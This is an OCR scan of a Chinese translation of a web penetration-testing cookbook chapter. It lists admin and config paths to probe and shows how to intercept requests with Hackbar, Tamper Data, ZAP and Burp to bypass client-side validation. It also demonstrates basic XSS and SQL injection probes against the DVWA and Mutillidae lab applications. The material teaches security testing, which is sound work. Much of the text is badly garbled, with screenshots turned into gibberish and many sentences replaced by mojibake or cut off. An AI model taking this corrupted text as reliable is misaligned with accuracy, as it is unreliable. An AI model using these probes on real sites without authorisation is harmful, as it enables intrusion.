2. 4 —^v& L8) P SH KR e 5; Z8 X SIS E EA, : 


o Change 
o Forgot 
o lost-password 
o Password 
o Recover 
o Reset 
3. 下面， 我 们 需要 识别 是 否 存在 应 用 的 管理 员 部 分 ， 这 里 有 一 组 功能 可 能 允许 我 们 执行 高 
权限 的 操作 ， 例 如 : 


o Admin 
o Config 
o Manager 
o Root 
其 它 有 趣 的 目录 是 内 容 管 理 系统 (CMS) 的 管理 员 、 数 据 库 或 应 用 服务 器 之 一 ， 例 如 


o Admin-console 
o Adminer 

o Administrator 
o Couch 

o Manager 


o Mylittleadmin 
o PhpMyAdmin 
o SqlIWebAdmin 
o Wp-admin 
5. Æ MMR fe JF AL RRG RARP o 3E EL EGER ZI AAT BRE R HAERA *. PELEAS R 
们 搜索 缺陷 的 时 候 是 个 很 好 的 目标 。 这 些 目 录 的 名 称 包含 


o Alpha 
o Beta 
o Dev 
o Development 
o QA 
o Test 
6. Web 服务 器 的 信息 和 配置 文件 如 下 


o config.xml 
o info 
o phpinfo 
o server-status 
o web.config 
7 此外， 所 有 在 robots.txt 中 标记 为 Disallow 的 目录 和 文件 可 能 非常 实用 。 


工作 原理 


一 些 前 面 列 出 的 名 称 和 它们 的 语言 变 体 允许 我 们 访问 站 点 的 首先 部 分 ， 这 是 渗透 测试 中 非常 
ma o 它们 中 的 一 些 能 够 提供 给 我 们 服务 器 ， 它 的 配置 以 及 所 使 用 的 开发 框架 信息 。 

它 的 ， 例 如 Tomcat 管理 器 和 JBoss 的 登录 页 面 ， 如 果 配 置 不 当 的 话 ， 会 让 我 们 (或 恶意 
获得 服务 器 的 控制 。 


第 四 章 漏洞 发 现 


作者 : Gilberto Najera-Gutierrez 
译 者 : 飞龙 


协 仅 : CC BY-NC-SA 4.0 


TEN 

fa] 介 

RLE CAZA T RE HAUS ALPE ^ HERA) 3 8 AA AR 4-25 0 9E RAE IR g XE 
型 ， 以 及 一 些 可 能 的 弱点 。 现 在 是 实际 测试 应 用 以 及 检测 它 的 漏洞 的 时 候 了 。 


一 章 中 ， 我 们 会 涉及 到 检测 一 些 Web 应 用 中 常见 漏洞 的 过 程 ， 以 及 允许 我 们 发 现 和 利用 
们 的 工具 。 


我 们 也 会 用 到 vulnerable vm 中 的 应 用 ， 我 们 会 使 用 OWASP Mantra 作为 浏览 来 执行 这 些 测 
试 。 


4.1 使 用 Hackbar 插件 来 简化 参数 分 析 


在 测试 Web 应 用 时 ， 我 们 需要 和 浏览 器 的 地 址 栏 交 互 ， 添 加 或 修改 参数 ， 以 及 修改 URL 。 一 
些 服 务 器 的 相应 会 包含 重 定向 ， 刷 新 以 及 参数 修改 。 所 有 这 些 改 动 都 会 使 对 相同 变量 尝试 不 
同 值 的 操作 非常 费时 间 。 我 们 需要 一 些 工具 来 使 它们 不 那么 混乱 。 


Hackbar 是 Firefox 插件 ， 它 的 行为 就 像 地 址 栏 ， 但 是 不 受 由 服务 器 响应 造成 的 重 定向 或 其 它 
修改 影响 ， 这 就 是 我 们 需要 测试 Web 应 用 的 原因 。 


这 个 秘籍 中 ， 我 们 会 使 用 Hackbar 来 简化 相同 请 求 的 不 同 版 本 的 发 送 工作 。 
准备 

果 你 没有 使 用 OWASP Mantra， 你 需要 在 你 的 Firefox 上 安装 Hackbar。 
TEE v JE 


1. 访问 DVWAGE.EL 3k o ERA 83 E] P 5/988 83 284-7. admin/admin ° 


2. 在 左 侧 的 菜单 上 选择 SQL Injection (SQL 注入 ) œ 


Damn Vulnerable Web App (DVV/A) v1.8 :: Vulnerability: SGL injection - OWASP Mantra 
B Damn Vulnerable Web App ... * 











€ ni" 182.158.55.102/dvwa/vulnerabiibes sql Googe- H WERE OD om C; Fk 
$ 
ve 
ES 
s 
i 
e 
Ll = 
|| Submit 
E d 
å Command Execulien More info 
CSRF hip iowenw.securiieam.cornisecurityrevievws' S DPONHTPZSE himi 
ua insecure CAPTCHA biplan wikipedia org^wili SQL. Injection 
mr» 一 —————— hiürprfe rmm avituma, cermdsml section -chs adshes]-oku/ 
- File Inclusion | hiiparpentosim y net/cheat-shiaeksgi-imjechon!mysqgi-sgiHnjg ction-che at sheet 





SOL Imechar 


€ E 


SOL Injection (Blind) 


3. 在 User ID 输入 框 中 输入 数字 ， 并 点 击 submit (4€ X) o 


现在 我 们 可 以 按 下 Fo 或 者 点 击 图 标 来 显示 Hackbar 。 


E Damn Vulnerable Web App... x & 
INT " = 9 SQL- XSS- Encryption: Encoding Other- 





Load URL | http ://152. 168.55. 102/dvwa/vulnarabilitiss/sqli, 
e ys Mde] 


i Split URL &Subait-5ubai ti] 十 | 


| Execute 


Enable Post data Enable Refarrer 









€- ns T 192.168.55.102/dvwa^ ulnerabilitiez/sqLi/?id- L &Submit- Submit ! E FH M I EE Li Es fi * 

E 4 

z 

4 

be 

i ^" 

a Maremma | User ID: 

-À Setup | 

p "Submit 
Brute Force | Um 

[E] —€—— ID: 1 
Command Execution First name: admin 

5 | Surname: admin 

[1 =a 


Hackbar 会 赋值 URL 及 其 参数 。 我 们 也 可 以 开 尼 修改 POST 请 求 和 Referer 参数 的 选 
项 。 后 者 告诉 服务 器 页 面 从 哪里 被 请 求 。 


4. 让 我 们 做 个 简单 的 改动 ， 将 id 参数 值 从 1 AA 2 ， 并 点 击 Execute (执行 ) 或 者 使 
用 Alt + x 快捷 键 。 


MT 7 = è SUL: X55 Encryption Encoding: Othar" 
a Load URL "i gh //182,1868.56.102/dwwa/wulnerabilities/sgli;/ 


aem cubm të 


à Split URL 十 


u Execute 

















Enable Post data | Enable Referrer 
zz x m 





: Tem | Vulnerability: SQL Injection 

4 irc | User ID: | 
s Setup BE | 

nr ub 

Brute Force ID: 2 

e Command Execution | aa cx 

T CSRF | 
A inenrnre (CAPTCHA 


我 们 可 以 看 到 ， 参 数 id 对 应 页 面 上 的 文本 框 ， 所 以 ， 我 们 可 以 使 用 Hackbar 修改 id 来 
尝试 任何 值 ， 而 不 需要 修改 文本 框 中 的 user ID 。 在 测试 拥有 许多 输入 的 表 
单 ， 或 者 取决 于 输入 重 定 向 到 其 它 页 面 的 表单 时 ， 这 非常 便利 。 


5 我 们 可 以 将 一 个 有 效 值 蔡 换 为 另 一 个 ， 但 是 如 果 我 们 输入 了 一 个 无 效 值 作为 id ， 会 发 生 
什么 呢 ? 尝试 将 单 引 号 作为 id 
€ nm 192.158,556.10 2/dvwa/vulnerabilitias/sqiu?id &'& SubmitsSubmits ode RE MEOS ü t 


NT * = 9 SüL: X55- Encryphon Encodings Other: 
ai Load URL atn //192.158.56.102/dvwa/vulnarabilities/sqli/ 


&S5usbmpiteSubmi 


à Split URL + 
"| Execute 

Enable Post data Enable Referrer 
$ You have an error in your SL syntax; check the manual that corresponds to your HySQL server version far the right syntax to use near '' 
$ 


通过 输入 应 用 非 预期 的 字符 ， 我 们 触发 了 一 个 错误 ， 这 在 之 后 测试 一 些 漏 洞 的 时 候 非 第 
有 用 。 


工作 原理 


Hackbar 是 带 有 一 些 实用 特性 的 第 二 个 地 址 栏 ， 比 如 不 受 URL 重 定 向 影响 ， 并 且 人 允许 我 们 修 
改 POST 参数 。 


此 外 ，Hackbar 可 用 于 向 我 们 的 请 求 中 添加 SQL 注入 或 跨 站 脚本 代码 段 ， 以 及 哈 希 、 加 密 和 
编码 我 们 的 输入 。 我 们 会 在 这 一 章 后 面 的 秘籍 中 深入 探索 SQL 注入 、 跨 站 脚本 ， 以 及 其 他 沁 


Wp 
(m Oo 


4.2 使 用 Tamper Data 插件 拦截 或 修改 请 求 


有 时 候 ， 应 用 拥有 客户 端的 输入 校 验 机 制 ， 它 们 通过 JavaScript， 隐 藏 表单 或 者 POST X 
据 ， 并 不 能 直接 在 地 址 栏 中 了 解 或 看 到 。 为 了 测试 这 些 以 及 其 它 类 型 的 变量 ， 我 们 需要 拦截 
浏览 器 发 送 的 请 求 并 且 在 它们 到 达 服 务 器 之 前 修改 它们 。 这 个 秘籍 中 ， 我 们 会 使 用 叫做 
Tamper Data 的 Firefox 插件 来 拦截 表单 提交 并 且 在 它 离 开 计 算 机 之 前 修改 一 些 值 。 


$ vg 3k 漏洞 发 现 


操作 步骤 


1. AA Mantra 的 菜单 中 访问 Tools | Application Auditing | Tamper Data ° 






























| Damn Vulnerable Web App (DVWA) - Login - OWASP Mantra EAS « 
| & Damn Vulnerable Web App... * &, 
| € > Bi- [|!192.168.56.102/dvwallogn php Preferences 
| pokmark 
| + Mi Bookmarks 
| 2 Privacy and Security WD DONNA 

m Dàwnlaads 

Debug Tools t 

| Ga Utilities ^ Preferences 
|| 5 Help 

C] Infarmatibn Gathermg — ? 

m Editors + 
| i iiaia Network Utilities $ 
| rm Misc * 
| Ë Tamper Data Acmlie atm Audit 
sa Password Live HTTP headers Proxy : 

本 HttpFo | 
| EF x Uncategorisad $ Edit This Menu... 

ia HttpRequester Ctrl Alt P 

a Ref Contrel Options. .. 
|- : 

7e 5 > 
2. 会 出 现 Tamper Data 的 禄 口 。 现 在 ， 让 我 们 浏览 < 
; > AY > E EAT 

http:/192.168.56.102/dvwa/login.php>。 我 们 可 以 在 插件 中 看 到 请 求 会 话 。 
| LJ | 
| Tamper Data 一 Ongoing requests = | | X 
| Start Tamper Stop Tamper Clear Options Help 
| 
| Filter | 
| Time Duration Total ... Size Method Status Content Type URL Load Flags n 
ll20 32:44... 12 ms 67 ms 600 GET 200 text/html http.//192.168.56.102/dvwallogin.. LOAD. DOCUM... | 
| 20-3 2:44... O ms Ü ms unknmo.. GET pending — unknown http.//192.168.56.102/dvwa/dvw.. LOAD NORMAL 
| Request Header Name Request Feader Value | Response Header Name Response Header Value 


|| 











每 个 浏览 器 产生 的 请 求 都 会 在 活动 时 经 过 Tamper Data ° 


3， 为 了 拦截 请 求 并 修改 它 的 值 ， 我 们 需要 通过 点 击 start Tamper 来 启动 Tamper。 现 在 启动 
Tamper ° 


4. WA EE A P E R AA o lha > test/password ， 之 后 点 击 Login ° 


5. 在 确认 框 中 ， 取 消 义 选 continue Tampering? 并 点 击 Tamper ° Tamper Popup 窗口 会 出 
现 o 
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6. 在 弹出 窗口 中 ， 我 们 可 以 修改 发 送 给 服务 器 的 信息 ， 包 括 请 求 头 和 POST 参数 。 
将 username 和 password 改 为 正确 的 admin/admin ) ' 之 后 点 击 0K e iX ELA EGKAT 
使 用 ， 而 不 是 DVWA : 


Tamper Popup 


http://192.168.56.102/dvwa/login.php 


Request Header Name Request Header Value Post Parameter Name Post Parameter Value 
Hos! 192,168.56.102 admin 
User-Agent Mozilla/5.0 (X11; Linux x86.64 password admin 
Accept text/html, application/xhtml-4 xm Login Login 
Accept-Language en-Us,enmg-0.5 
Accept-Encoding qzip, deflate 
Referer http.//192.168.55.102/dvwa/lo 
Cookie security-low; tz .aoffset-- 1800 
Cancel OK 


在 最 后 一 步 中 ， 我 们 在 表单 中 的 值 由 浏览 器 发 送 给 服务 器 之 前 修改 了 它们 。 因 此 ， 我 们 
可 以 以 正确 的 凭证 而 不 是 错误 的 凭证 登录 服务 器 。 


工作 原理 


Tamper Data 会 在 请 求 离开 浏览 器 之 前 捕获 请 求 ， 并 提供 给 我 们 时 间 来 修改 它 包 含 的 任何 变 
量 。 但 是 ， 它 也 有 一 些 限 制 ， 例 如 不 能 编辑 URL 或 GET 参数 。 


4.3 使 用 ZAP 来 查看 和 修改 请 求 


虽然 Tamper Data 有 助 于 测试 过 程 ， 有 时 我 们 需要 更 灵活 的 方法 来 修改 请 求 以 及 更 多 特性 ， 
例如 修改 用 于 发 送 它们 的 方法 (PPA GET 改 为 POST) ， 或 者 使 用 其 它 工具 为 进一步 的 目的 
保存 请 求 /响应 对 。 


OWASP ZAP 不 仅仅 是 Web 代码 ， 它 不 仅仅 能 够 拦截 流量 ， 也 拥有 许多 在 上 一 章 所 使 用 的 ， 
类 似 于 寂 忠 的 特性 ， 还 有 漏洞 扫描 里， 模糊 测 试 器 ， 爆 破 咽 ， 以 及 其 它 。 它 也 拥有 脚本 引 
葡 ， 可 以 用 于 自动 化 操作 或 者 创建 新 的 功能 。 


这 个 秘籍 中 ， 我 们 会 开始 将 OWASP ZAP 用 作 代 理 ， 拦 截 请 求 ， 并 在 修改 一 些 值 之 后 将 它 发 
送 给 服务 器 。 


准备 


启动 ZAP 并 配置 浏览 器 在 通过 它 发 送信 息 。 


操作 步骤 
1. 访问 http://192.168.56.102/mutillidae/ ° 


2. 现在 ， 访 问 茶 单 栏 中 


的 OWASP Top 10 | A1- SQL Injection | SQLi - Extract Data | User Info ? 


3. 下 一 步 是 提升 应 用 的 安全 等 级 o 反击 Toggle Security ° 现在 Security Level 应 该 


Æ 1 (Arrogant) ° 


4. 将 test' (包含 单 引 号 ) 作为 Name ， 以 及 password' 作为 Password ， 并 且 点 


击 View Account Details ? 


OWASP Mantra 

| http://192 16. .user-info.php x Ey 
e T 152,168.56. 10 2/mutiiidae/index.php?popllpNot£icationCodazSL1&page-user-infa.pl LH SN NxODm: Kk 
* 

Jh 

4 

c 

SEE 

i 

Dangerous charecrers detected. We cant allow these, [his af nowert 

. blacklist will stop such attempts 
ua 
Zi Much like padlocks, filtering cannot be defeated. 

3 
(s Blacküsrinag is |33t like I33rspeak. 

- DK 
g 
E 
k 


我 们 得 到 了 警告 消息 ， 告 诉 我 们 输入 中 的 一 些 字符 不 合法 。 这 里 ， 单 引号 被 检测 到 了 ， 
并 被 应 用 的 安全 手段 中 止 。 


5， 点 击 ok 来 关闭 警告 。 


如 果 我 们 在 ZAP 中 检查 历史 ， 我 们 可 以 看 到 没有 发 给 服务 器 的 请 求 ， 这 是 由 于 客户 端 校 
验 机 制 。 我 们 会 使 用 请 求 拦截 来 绕 过 这 个 保护 。 


6. 现在 我 们 开启 请 求 拦截 (在 ZAP 叫做 断 点 ) ， 通 过 点 击 "break on all requests ( P Bj 
所 有 请 求 ) 按钮 。 


第 四 章 漏洞 发 现 


Untitled Session - OWASP ZAP 2.4.0 





| jb > ©% 





7. TA’ RIA TARIE Name 和 Password ， 就 像 test 和 password ， 并 再 次 检查 细 


ZAP 会 转移 焦点 ， 并 打开 叫做 Break 的 新 标签 页 。 这 里 是 刚刚 在 页 面 上 产生 的 请 求 ， 我 
们 可 以 看 到 一 个 GET 请 求 ， 带 有 在 URL. 中 发 送 的 username 和 password 参数 。 我 们 可 
以 添加 上 一 次 尝试 中 不 允许 的 单 引 号 。 


ine Help 
dte CaA 900 ,.wor»oxmd4&amg «s 





(Method fw| |Header Text iw) | Body: Text =] 

GET à 
http://192.168.56.102/mutillidae/index.php?page-user-info.php&usernamestest'&password-password'&user-info-p. | 
hp: submi t- butten-viewrAccountrDetarls HTTP/1.1 

Host: 192.168.56.102 

User-Agent: Mozilla/5.0 (X11; Linux xBG 64; rv:18.0) Gacko/20100101 Flrefox/1B.0 

Accept: text/html,application/xhtmlexml,application/xml;qsQ.9,*/*;q-0.8 

Accept-Language: en-Us,en;q-0.5 

Referer: http://192.168.556.102/mutillidae/index.php?popUpNotificationCoadesSLl&pagezsuser-info.php 
Cookie: showhints-ü; tz offset--18000; PHPSESSID-S5qdcq4Bec37ocue4]cpcbzo025; acopendivids-swingset,]otto, 
|phpbb2,redmine; acgroupswithpersistznada; LoggedinzTrue; Serverzb3dhc3B&id2E-s 


sam mee mnam m es meme a lcm ml nam. = 











8. 为 了 继续 而 不 会 被 ZAP 打 断 ， 我 们 通过 点 击 Unset Break 44a 3k 2 JE] Ip A 


Untitled Session - OWASP ZAP 2.4.0 





M MÀ À— De ee à — á —————— M —À 2 一 一 一 -一 = 一 一 一 一 一 一 一 一 


on Gan y Qe b oxmánm X 








过 播放 按钮 来 提交 修改 后 的 请 求 。 
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OWASP Mantra » LI | 















| nttp.//192.15..0unt«Details x &y | 
c ni = 192.168.56.102/mutillidae/index.php?pageusar-info.php&usernamazusar&pass word i € NB fi * 
* [i [^ 
Hd — — | User Looku 
Web Services 
* | L 
5 » 
| 
> dX swi — 
| AJAX Switch to SOAP Web Service Version of this Page 
d 
A 
tà Please enter username and password 
& | | to view account details 
€ Name | 
€ P d | 
em asswor 
a| v 
uw Release | View Account Details | 
¢ Announcements 
ji Dont have an account? Please register here 
pe Error Message 
Lom | Failure is always am option 
justes Um jl 
de |o 
Fila Fcwaspbwa /mutillidae-git/classes/Hys5DLHPandlar.php 





|| /cwaspbwa /mutillidae-git/classes/MySQLHamdlar.php on line 16$: Error executing 
query: 


我 们 可 以 看 到 ， 应 用 在 顶部 提供 给 我 们 错误 信息 ， 所 以 这 是 它 的 保护 机 制 ， 它 在 客户 端 
检查 用 户 输 入 ， 但 是 在 服务 端 并 没有 准备 好 处 理 非 预期 的 请 求 。 


工作 原理 


这 个 秘籍 中 ， 我 们 使 用 ZAP 代理 来 拦截 有 效 的 请 求 ， 将 它 修 改 为 无 效 或 而 已 请 来， 之 后 把 它 
发 给 服务 器 并 且 触 发 非 预 期 的 行为 。 


前 三 步 用 于 开启 安全 保护 ， 便 于 应 用 可 以 将 单 引号 检测 为 无 效 字 符 。 


之 后 ， 我 们 产生 测试 请 求 ， 并 证 实 了 会 执行 一 些 校 验 。 提 示警 告 的 时 候 ， 没 有 请 求 通过 代 
理 ， 这 告诉 了 我 们 检验 是 在 客户 端 进行 的 ， 可 能 使 用 JavaScript。 知 道 了 这 个 之 后 ， 我 们 产 
生 了 合法 的 请 求 ， 并 使 用 代理 来 拦截 它 ， 这 让 我 们 能 够 绕 过 客户 端的 保护 。 我 们 将 该 请 求 转 
换 为 恶意 请 求 ， 并 把 它 发 给 服务 器 ， 这 使 它 不 能 被 正确 处 理 ， 并 返回 错误 。 


4.4 使 用 Burp Suite 查看 和 修改 请 求 


Burp Suite 和 OWASP ZAP 一 样 ， 也 不 仅仅 是 个 简单 的 Web 代理 。 它 是 功能 完整 的 Web 应 
用 测试 包 。 它 拥有 人 代理、 请求 重 放 器 、 请 求 自 动 化 工具 、 字 符 串 编码 器 和 解码 器 ， 漏 洞 扫 描 
X (Pro 版 本 中 ) ， 以 及 其 它 实用 的 功能 。 


eh 


SAS 


这 个 秘籍 中 ， 我 们 会 执行 上 一 个 练习 ， 但 是 这 次 使 用 Burp Suite 的 代理 功能 来 拦截 和 修改 请 


准备 


2. 


启动 Burp Suite 并 让 浏览 器 使 用 它 的 代理 。 


TETTE JE 


1. 


浏览 http://192.168.56.102/mutillidae/ ° 


默认 情况 下 ，Burp 代理 中 的 拦截 器 是 开 着 的 ， 所 以 他 会 捕获 第 一 个 请 求 。 我 们 需要 打开 
Burp Suite 并 点 击 Proxy 标签 页 中 的 Intercept is on 按钮 。 


Burp Intruder Repeater Window Help 





| Target Proxy Spider | Scanner | Intruder | Repeater | Sequencer | Decoder | C 





| intercept. HTTP history | WebSockets history | Options 


|f | Request to http:/192.168.56.102:80 





Forward | | Drop | B Intercept is on E Action | 





Raw | Params | Headers | Hex | a 


TT iT TT a 


浏览 器 会 继续 加 载 页 面 。 当 它 完 成 时 ， 我 们 通过 Toggle Security 将 当前 的 应 用 安全 级 别 


设置 为 1 (Arrogant) 。 


MORE dn 
l2] OWASP Top 10 | A1 - SQL Injection | SQLi - Extract Data | User Info ? 


在 Name 输入 框 中 ， 对 username 输入 user<> (包括 符号 ) 。 在 Password 输入 框 中 ， 


对 Password 输入 secrete» °。 之 后 点 击 View Account Details ° 
我 们 会 得 到 敬告， 告诉 我 们 我 们 可 能 向 应 用 输入 了 一 些 危险 字符。 


现在 我 们 直到 这 些 符号 在 表单 中 并 不 允许 ， 我 们 也 知道 了 它 是 客户 端的 校 验 ， 因 为 代理 
的 HTTP history 标签 页 中 没有 任何 请 求 出 现 。 让 我 们 尝试 绕 过 这 个 保护 。 通 过 点 击 Burp 
Suite 中 的 Intercept is off 来 开启 消息 拦截 。 




































































| Target. Proxy | Spider | Scanner | Intruder | Repeater | Sequencer | Decoder | Comparer 


| Intercept | HTTP history | webSockets history | Options | 


Forward Drop | intercept is ta Actial 


Raw Params Headers Hex Toggle message interception | 


下 一 步 是 发 送 有 效 数 据 ， 例 如 user 和 secret ° 


8. 代理 会 拦截 该 请 求 。 现 在 我 们 修改 username 和 password 的 值 ， 通 过 添加 禁止 的 字 


大 大 
^L ESSE ? 


| AF Request ta http:/182.1688.56.102:&0 


Intercept is an. Action | a ! Ti 


I 


| Forward | Drop | 

















-Raw | Params | Headers. Hex 





GET rmutilidas/tndex.php?pagez ussr-infc.phpseusarnammuee user > Spa rd = sscrat« » S&user-infc-php-submit-buttonz View + Account Details HTTE/1.3 À 
Host: 192.166.556.102 

[User-Agent: Mozilla/5.0 (X11: Luur XB6 64: rv: 18,0] Gecko/20100101 Frrefox/iB.o 

Accept: baxt/htmi. applscatsian/xhEmi4 xml, applicationhenl:g- 9,9 */* qc 0.8 

Accept-Lanquage: eUS en-üq-o.b 

Accept-Encoding: gzip, deflate 

(Referer: tp ise. 1 68.56. 102/mutillidaeindex.php?page- userinfo php 

Cookie: showhints-O:; Ez offsst- -1800Cc PHPSESSID- d71331afjquretlbasuh2037 a3 

Cannecticn: keep-alive 


9. 我 们 可 以 发 送 编辑 后 的 信息 ， 并 通过 点 击 Intercept is on 来 禁用 拦截 ， 或 者 我 们 可 能 
酸 发 送 他 并 保持 消息 拦截 ， 通 过 点 击 Forward 。 对 于 这 个 练习 ， 我 们 禁用 拦截 并 检查 结 


F — - e: 
OWASP Mantra za "Wi, | 
| nttp://192.16..0unt* Details * 


n 14192 158 Sb, 102/muti jaelndex.php? page ven nfa.php&username-user&password G T El ue ^ ma - "ina ~C f t | 





Version: 2.6.3.1 Security Level: 1 (Arrogent) Hints: Disabled (0 - | try harder) Not Logged In 


Höme LoginiRegister Toggle Security Resel DE View Log View Caplured Data Show Popup Hinis Emiaree SSL 


E User Lookup | 
1] UST T og Te 7 


Li 
LN 
dX sw | 
| AJAX Switch to SOAP Web Service Version of this Page 


À | Authentication Error: Bad user name or password ` 


OWASP Top 10 


Please enter username and password 
to view account details 


Name 


^"^4uoeseculse-meys1 


Raleasa Password 
Announcements 


Tou Dont have an account? Please register here 
| Results for "user«-",0 records found. 


I BEAR 
Wideo 





Armasaer Movzilla/S NM (W117 im vB& AA me IAM (Geckenf/2n1nnn Fieefew/18 n 


工作 原理 


就 像 在 上 个 秘籍 中 看 到 的 那样 ， 在 请 求 经 过 由 应 用 建立 在 客户 端的 验证 机 制 之 前 ， 我 们 使 用 
代理 来 捕获 请 求 ， 并 通过 添加 一 些 在 检验 中 不 允许 的 字符 ， 修 改 了 它 的 内 容 。 


能 够 拦截 和 修改 请 求 ， 对 任何 Web 应 用 渗透 测试 来 说 都 非常 重要 ， 不 仅仅 用 于 绕 过 一 些 客 户 
端 检验 ， 就 像 我 们 在 当前 和 上 一 个 秘籍 中 所 做 的 那样 ， 也 能 够 用 于 了 解 发 送 了 哪个 信息 ， 以 
及 尝试 理解 应 用 的 内 部 原理 。 我 们 可 能 也 需要 基于 我 们 的 理解 来 添加 、 移 除 或 替换 一 些 值 。 


4.5 识别 跨 站 脚本 (XSS) 漏洞 


跨 站 脚本 (XSS) X Web 应 用 中 最 常见 的 漏洞 之 一 。 实 际 上 ， 它 位 于 2013 年 OWASP Top 
10 的 第 三 名 («https://www.owasp.org/ index.php/Top 10 2013-Top 10») 。 


这 个 秘籍 中 ， 我 们 会 看 到 一 些 识 别 Web 应 用 中 路 站 脚本 漏洞 的 关键 点 。 
操作 步骤 


1. 登录 DVWA 并 访问 反射 型 XSS。 


2， 测 试 漏洞 的 第 一 步 是 观察 应 用 的 正 第 响应 。 在 文本 框 中 输入 名 称 并 点 击 submit 按钮 。 我 
们 使 用 Bob 。 


Vulnerability: Reflected Cross Site Scripting (XSS) 


What's your name? 


Hello Bob 





3. 应 用 会 使 用 我 们 提供 的 名 称 来 拼接 代码 。 如 果 我 们 不 输入 有 效 名 称 ， 而 是 输入 一 些 特殊 
字符 或 数字 会 怎么 样 呢 ?让 我 们 党 试 <'this is the 1st test'> ° 


Vulnerability: Reflected Cross Site Scripting (XSS) 


What's your name? 


| g || Submit 


Hello «'this is the lst test'» 





4. 现在 我 们 可 以 看 到 ， 我 们 输入 在 文本 框 汇总 的 任何 东西 都 会 反射 到 响应 中 ， 也 就 是 说 ， 
它 成 为 了 响应 中 HTML 页 面 的 一 部 分 。 让 我 们 检查 页 面 源 代 码 来 分 析 它 如 何 展 示人 信息 ， 
就 像 下 面 截图 中 那样 : 


Source of: http://192.168.56.102/dvwa/vulnerabilities/xss-r/?namezX3 CX2 7this-is--the- 


File Edit View Help k 
«div id-'main body*- 
«div class-"body padded"» 
«hl-Vulnerability: Reflected Cross Site Scripting (X5S)«/hl» 
ediv class-"vulnerable code area" 
«form names"XSS" action="#" methods" GET" 
«p»What's your name?«/p» 
«input type="text" nane-"name*» 
«input type-"submit" value-"Submit"» 
</form> 
<pre>Hello «'this is the 1st test's»«/pre- 
</div> 


chz»More infoz/hz» 





源码 表明 了 输出 中 没有 对 任何 特殊 字符 做 编码 。 我 们 发 送 的 特殊 字符 被 反射 回 了 页 面 ， 
没有 任何 预 处 理 。 < 和 > 符号 适用 于 定义 HTML 标签 的 符号 ， 我 们 可 能 能 够 在 这 里 输入 
一 些 脚 本 代码 o 


尝试 输入 一 个 名 称 ， 后 面 带 有 非常 简单 的 脚本 代码 。 


Bob«script»alert('XSS')«/script» 


| ) Damn Vulnerable Web App... * y | 
€- fT | 192.168.56.10 2/dvwa/vulnerabilities/xss .r/?name-Bobsscript»alert[ ASS Je 2Fscriptst Soge * mé f ok | 
* 
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9 
页 面 会 执行 脚本 ， 并 弹出 提示 框 ， 衣 明 这 个 页 面 上 存在 跨 站 脚本 汤 洞 。 


es 


在 检查 源码 来 观察 输入 中 发 生 了 什么 。 


r 


Source of: http://192.168.56.102/dvwa/vulnerabilities/xss-r/?namezBobX3CscriptK3Eale — | 
File Edit View Help 


«div class="body padded"> 
ehi»Vulnerability: Reflected Cross Site Scripting (X55)«/hl» 


«div class-"vulnerable cade area"» 


«form name-"X55" action-"£' method-"GET"» 
«p»What's your name?e/p» 
«input type="text" name="name" > 
«input type="submit" values"Submit"- 
</form> 




















«pre»Hello Bobescriptsalert('XSS' ) /script»«/pre» 
z/ div» k 


ehz2»More info«c/h2» 


— — — lu 


cul» = 
eli>ea href="hħhttp:/; com Hil 5 $ | 





我 们 的 输入 看 起 来 作为 HTML 的 一 部 分 来 处 理 。 浏 览 器 解释 了 <script> 标签 并 执行 了 其 
中 的 代码 ， 弹 出 了 我 们 设置 的 提示 框 。 


工作 原理 


跨 站 脚本 漏洞 在 服务 端 和 客户 端 中 没有 输入 校 验 ， 并 且 输 出 没有 合理 编码 时 发 生 。 这 意味 着 
应 用 允许 我 们 输入 用 于 HTML. 代码 中 的 字符 。 一 旦 它 被 决定 发 送 到 页 面 中 ， 并 没有 执行 任何 
编码 措施 (例如 使 用 HTML 转 义 代码 &lt 和 &gt; ) 来 防止 他 们 被 解释 为 源 代 码 。 


这 些 漏 洞 可 被 攻击 者 利用 来 改变 客户 端的 页 面 行为 ， 并 欺骗 用 户 来 执行 它们 不 知道 的 操作 ， 
或 偷 取 隐私 信息 。 


为 了 发 现 XSS 漏洞 ， 我 们 需要 遵循 以 下 原则 : 


e 我 们 在 输入 框 中 输入 的 ， 准 确 来 说 是 被 发 送 的 文本 ， 用 于 形成 在 页 面 中 展示 的 信息 ， 这 
是 有 反射 型 汤 洞 。 


。 特殊 的 字符 没有 编码 或 转 义 。 


e 源 代 码 表 明 ， 我 们 的 输入 被 集成 到 某 个 位 置 ， 其 中 它 变 成 了 HTML 代码 的 一 部 分 ， 并 且 


会 被 浏览 器 解释 。 


多 


(e 


这 个 秘籍 中 ， 我 们 发 现 了 反射 型 XSS， 也 就 是 说 这 个 脚本 在 每 次 我 们 发 送 请 求 时 ， 并 且 服 务 
器 响应 我 们 的 和 恶意 请 求 时 都 会 执行 。 有 另外 一 种 XSS 类 型 叫做 “存储 型 "。 存储 型 XSS 可 能 会 
在 输入 提交 之 后 立即 展示 ， 也 可 能 不 会 。 但 是 这 种 输入 会 储存 在 服务 器 〈 也 可 能 是 数据 库 ) 

中 ， 它 会 在 用 户 每 次 访问 储存 数据 时 执行 。 


4.6 基于 错误 的 SQL 注入 识别 


注入 在 OWASP top 10 列表 中 位 列 第 一 。 这 和 包含， 我 们 会 在 这 个 秘籍 中 测试 的 漏洞 : SQL 注 
A (SQLD ， 以 及 其 它 。 


多 数 现代 Web 应 用 实现 了 茶 种 类 型 的 数据 库 ， 要 么 本 地 要 么 远程 。SQL 是 最 流行 的 语言 ， 在 
SQLI 攻击 中 ， a A SQL 命令 ， 使 应 用 发 送 修改 后 的 
请 求 ， 来 试图 不 正当 使 用 应 用 和 数据 库 通 其 中 请 求 用 于 构建 服务 器 中 的 SQL EG o 


这 个 秘籍 中 ， 我 们 会 测试 Web 应 用 的 输入 ， 来 观察 是 否 含有 SQL 注入 漏洞 。 


操作 步骤 
登录 DWVA 并 执行 下 列 步 又 
1. 访问 SQL Injection ° 


2. 类似 于 上 一 草 ， 我 们 通过 输入 数字 来 测试 应 用 的 正常 行为 。 将 user ID 设置 为 1， 并 点 
击 Submit 。 


我 们 可 以 通过 解释 结果 来 得 出 ， 应 用 首先 查询 数据 库 ， 是 否 有 ID 等 于 1 的 用 户 ， 之 后 返 
EAE 


3. 下面 ， 我 们 必须 测试 ， 如 果 我 们 发 送 一 些 应 用 的 非 预 期 结果 ， 会 发 生 什么 。 在 输入 框 中 
输入 1' 并 提交 该 ID 


OWASP Mantra 


€) https.//192.1...bmit- Submit x © 
= Bi- | Ē https//192.168.56.102/dvwa/vulnerabilities/sqli/?id-1 Googie E] NEO mm 57; fi * 
* You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the ri 
量 

wa 

i 


